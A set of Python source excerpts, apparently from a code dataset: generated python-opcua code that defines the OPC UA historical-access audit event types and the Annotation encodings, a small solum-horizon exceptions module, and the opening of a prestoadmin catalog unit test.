node.RequestedNewNodeId = NumericNodeId(3033, 0)
node.BrowseName = QualifiedName('OldValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3006, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("OldValues")
attrs.DataType = NumericNodeId(23, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3033, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3033, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3033, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3006, 0)
refs.append(ref)
server.add_references(refs)
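# AuditHistoryDeleteEventType (i=3012): abstract ObjectType under i=2104 with
# an UpdatedNode property; the more specific delete audit event types below
# are subtypes of it.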
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3012, 0)
node.BrowseName = QualifiedName('AuditHistoryDeleteEventType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(2104, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("AuditHistoryDeleteEventType")
attrs.IsAbstract = True
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3012, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3027, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(3012, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(2104, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3027, 0)
node.BrowseName = QualifiedName('UpdatedNode', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3012, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("UpdatedNode")
attrs.DataType = ua.NodeId(ua.ObjectIds.NodeId)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3027, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3027, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3027, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3012, 0)
refs.append(ref)
server.add_references(refs)
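# AuditHistoryRawModifyDeleteEventType (i=3014): abstract subtype of i=3012
# with IsDeleteModified, StartTime, EndTime and OldValues properties.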
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3014, 0)
node.BrowseName = QualifiedName('AuditHistoryRawModifyDeleteEventType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(3012, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("AuditHistoryRawModifyDeleteEventType")
attrs.IsAbstract = True
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3014, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3015, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3014, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3016, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3014, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3017, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3014, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3034, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(3014, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3012, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3015, 0)
node.BrowseName = QualifiedName('IsDeleteModified', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3014, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("IsDeleteModified")
attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3015, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3015, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3015, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3014, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3016, 0)
node.BrowseName = QualifiedName('StartTime', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3014, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("StartTime")
attrs.DataType = NumericNodeId(294, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3016, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3016, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3016, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3014, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3017, 0)
node.BrowseName = QualifiedName('EndTime', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3014, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("EndTime")
attrs.DataType = NumericNodeId(294, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3017, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3017, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3017, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3014, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3034, 0)
node.BrowseName = QualifiedName('OldValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3014, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("OldValues")
attrs.DataType = NumericNodeId(23, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3034, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3034, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3034, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3014, 0)
refs.append(ref)
server.add_references(refs)
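# AuditHistoryAtTimeDeleteEventType (i=3019): abstract subtype of i=3012 with
# ReqTimes and OldValues properties.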
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3019, 0)
node.BrowseName = QualifiedName('AuditHistoryAtTimeDeleteEventType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(3012, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("AuditHistoryAtTimeDeleteEventType")
attrs.IsAbstract = True
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3019, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3020, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3019, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3021, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(3019, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3012, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3020, 0)
node.BrowseName = QualifiedName('ReqTimes', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3019, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("ReqTimes")
attrs.DataType = NumericNodeId(294, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3020, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3020, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3020, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3019, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3021, 0)
node.BrowseName = QualifiedName('OldValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3019, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("OldValues")
attrs.DataType = NumericNodeId(23, 0)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3021, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3021, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3021, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3019, 0)
refs.append(ref)
server.add_references(refs)
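# AuditHistoryEventDeleteEventType (i=3022): abstract subtype of i=3012 with
# EventIds and OldValues properties.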
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3022, 0)
node.BrowseName = QualifiedName('AuditHistoryEventDeleteEventType', 0)
node.NodeClass = NodeClass.ObjectType
node.ParentNodeId = NumericNodeId(3012, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.ObjectTypeAttributes()
attrs.DisplayName = LocalizedText("AuditHistoryEventDeleteEventType")
attrs.IsAbstract = True
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3022, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3023, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3022, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3024, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(3022, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3012, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3023, 0)
node.BrowseName = QualifiedName('EventIds', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3022, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("EventIds")
attrs.DataType = ua.NodeId(ua.ObjectIds.ByteString)
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3023, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3023, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3023, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3022, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(3024, 0)
node.BrowseName = QualifiedName('OldValues', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(3022, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("OldValues")
attrs.DataType = NumericNodeId(920, 0)
attrs.ValueRank = -1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(3024, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(3024, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(3024, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(3022, 0)
refs.append(ref)
server.add_references(refs)
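# Annotation (i=891): DataType under i=22 (Structure).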
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(891, 0)
node.BrowseName = QualifiedName('Annotation', 0)
node.NodeClass = NodeClass.DataType
node.ParentNodeId = NumericNodeId(22, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.DataTypeAttributes()
attrs.DisplayName = LocalizedText("Annotation")
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(891, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(22, 0)
refs.append(ref)
server.add_references(refs)
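# ExceptionDeviationFormat (i=890): enumeration DataType under i=29 with its
# EnumStrings property (i=7614) listing the five enumeration values.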
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(890, 0)
node.BrowseName = QualifiedName('ExceptionDeviationFormat', 0)
node.NodeClass = NodeClass.DataType
node.ParentNodeId = NumericNodeId(29, 0)
node.ReferenceTypeId = NumericNodeId(45, 0)
attrs = ua.DataTypeAttributes()
attrs.DisplayName = LocalizedText("ExceptionDeviationFormat")
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(890, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(7614, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(45, 0)
ref.SourceNodeId = NumericNodeId(890, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(29, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(7614, 0)
node.BrowseName = QualifiedName('EnumStrings', 0)
node.NodeClass = NodeClass.Variable
node.ParentNodeId = NumericNodeId(890, 0)
node.ReferenceTypeId = NumericNodeId(46, 0)
node.TypeDefinition = NumericNodeId(68, 0)
attrs = ua.VariableAttributes()
attrs.DisplayName = LocalizedText("EnumStrings")
attrs.DataType = ua.NodeId(ua.ObjectIds.LocalizedText)
attrs.Value = [LocalizedText('AbsoluteValue'),LocalizedText('PercentOfValue'),LocalizedText('PercentOfRange'),LocalizedText('PercentOfEURange'),LocalizedText('Unknown')]
attrs.ValueRank = 1
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(7614, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(68, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(37, 0)
ref.SourceNodeId = NumericNodeId(7614, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(78, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(46, 0)
ref.SourceNodeId = NumericNodeId(7614, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(890, 0)
refs.append(ref)
server.add_references(refs)
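# Default Binary (i=893), Default XML (i=892) and Default JSON (i=15382):
# encoding objects for the Annotation DataType, linked back to i=891 via
# HasEncoding (i=38) references.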
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(893, 0)
node.BrowseName = QualifiedName('Default Binary', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(891, 0)
node.ReferenceTypeId = NumericNodeId(38, 0)
node.TypeDefinition = NumericNodeId(76, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("Default Binary")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(38, 0)
ref.SourceNodeId = NumericNodeId(893, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(891, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(39, 0)
ref.SourceNodeId = NumericNodeId(893, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(8244, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(893, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(76, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(892, 0)
node.BrowseName = QualifiedName('Default XML', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(891, 0)
node.ReferenceTypeId = NumericNodeId(38, 0)
node.TypeDefinition = NumericNodeId(76, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("Default XML")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(38, 0)
ref.SourceNodeId = NumericNodeId(892, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(891, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(39, 0)
ref.SourceNodeId = NumericNodeId(892, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(8879, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(892, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(76, 0)
refs.append(ref)
server.add_references(refs)
node = ua.AddNodesItem()
node.RequestedNewNodeId = NumericNodeId(15382, 0)
node.BrowseName = QualifiedName('Default JSON', 0)
node.NodeClass = NodeClass.Object
node.ParentNodeId = NumericNodeId(891, 0)
node.ReferenceTypeId = NumericNodeId(38, 0)
node.TypeDefinition = NumericNodeId(76, 0)
attrs = ua.ObjectAttributes()
attrs.DisplayName = LocalizedText("Default JSON")
attrs.EventNotifier = 0
node.NodeAttributes = attrs
server.add_nodes([node])
refs = []
ref = ua.AddReferencesItem()
ref.IsForward = False
ref.ReferenceTypeId = NumericNodeId(38, 0)
ref.SourceNodeId = NumericNodeId(15382, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(891, 0)
refs.append(ref)
ref = ua.AddReferencesItem()
ref.IsForward = True
ref.ReferenceTypeId = NumericNodeId(40, 0)
ref.SourceNodeId = NumericNodeId(15382, 0)
ref.TargetNodeClass = NodeClass.DataType
ref.TargetNodeId = NumericNodeId(76, 0)
refs.append(ref)
server.add_references(refs)
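# The code above appears to be machine-generated from the standard OPC UA
# nodeset (Part 11, Historical Access types). Every node is added with the
# same two-step pattern: build an AddNodesItem and pass it to
# server.add_nodes(), then build the AddReferencesItem entries (type
# definition, modelling rule and the inverse reference back to the parent)
# and pass them to server.add_references(). A minimal sketch of that pattern
# for a single hypothetical Boolean property (the namespace-1 ids below are
# made up for illustration) looks like this:
#
#     node = ua.AddNodesItem()
#     node.RequestedNewNodeId = NumericNodeId(60001, 1)
#     node.BrowseName = QualifiedName('MyCapability', 1)
#     node.NodeClass = NodeClass.Variable
#     node.ParentNodeId = NumericNodeId(2330, 0)
#     node.ReferenceTypeId = NumericNodeId(46, 0)   # HasProperty
#     node.TypeDefinition = NumericNodeId(68, 0)    # PropertyType
#     attrs = ua.VariableAttributes()
#     attrs.DisplayName = LocalizedText("MyCapability")
#     attrs.DataType = ua.NodeId(ua.ObjectIds.Boolean)
#     attrs.ValueRank = -1
#     node.NodeAttributes = attrs
#     server.add_nodes([node])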
| iirob/python-opcua | opcua/server/standard_address_space/standard_address_space_part11.py | Python | lgpl-3.0 | 125,106 | 0.000767 |
# Copyright (c) 2014 Rackspace Hosting.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openstack_dashboard import exceptions
#from solumclient.openstack.common.apiclient import exceptions as solumclient
NOT_FOUND = exceptions.NOT_FOUND
RECOVERABLE = exceptions.RECOVERABLE
# + (solumclient.ClientException,)
UNAUTHORIZED = exceptions.UNAUTHORIZED
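# These tuples extend the exception groups that Horizon uses to decide how an
# error is reported to the user (not found / recoverable / unauthorized). The
# commented-out lines show where python-solumclient exceptions would be
# appended to the recoverable group once that import is re-enabled.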
| rackerlabs/solum-horizon | solumdashboard/exceptions.py | Python | apache-2.0 | 854 | 0.001171 |
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
tests for catalog module
"""
import os
import fabric.api
from fabric.operations import _AttributeString
from mock import patch
from prestoadmin import catalog
from prestoadmin.util import constants
from prestoadmin.util.exception import ConfigurationError, \
ConfigFileNotFoundError
from prestoadmin.standalone.config import PRESTO_STANDALONE_USER_GROUP
from prestoadmin.util.local_config_util import get_catalog_directory
from tests.unit.base_unit_case import BaseUnitCase
class TestCatalog(BaseUnitCase):
def setUp(self):
super(TestCatalog, self).setUp(capture_output=True)
